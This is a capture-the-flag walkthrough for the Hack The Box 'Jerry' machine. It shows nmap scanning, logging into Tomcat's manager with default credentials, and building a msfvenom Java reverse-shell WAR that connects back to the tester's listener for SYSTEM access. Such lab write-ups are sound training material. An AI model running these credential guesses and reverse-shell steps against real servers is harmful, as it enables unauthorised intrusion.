Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  1. Walk-throughs
  2. HTB Windows Machines

Jerry HTB

IP

10.10.10.95

Initial nmap scan 

sudo nmap -p- --min-rate 10000 10.10.10.95 | cut -d"/" -f1 | tr '\n' ','

we can see we have the following port open on the target server

8080

Lets get some more details on this port

sudo nmap -sCV -p8080 10.10.10.95 -oA nmap_results

reults

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1

We can see apache tomcat is running on the target

  • version 7.0.88

Lets check it out

HTTP Port 8080

navigating to http://10.10.10.95:8080 we can confirm Apache Tomcat version 7.0.88 is indeed running

Let's see if we access the /manager directory

we are granted with a login request

we try the following

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
admin:tomcat

But no luck when but we are bought to this error page

we can see a set of credentials in the example window

tomcat: s3cret

Lets see if these work

and it does we are bought to the application manager

Since we can upload .war files we should be able to upload a reverse shell onto the target server and gain access

first lets generate a reverseshell to upload

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f war -o shell.war

start a listener

rlwrap -cAr nc -lvnp 9001

Now lets upload the file

we should have a hit on our listener

as you can see we are nt authority\system we owned the system

PreviousLegacyNextSilo HTB

Last updated 1 year ago

Now when we navigate to `http://`

10.10.10.95:8080/shell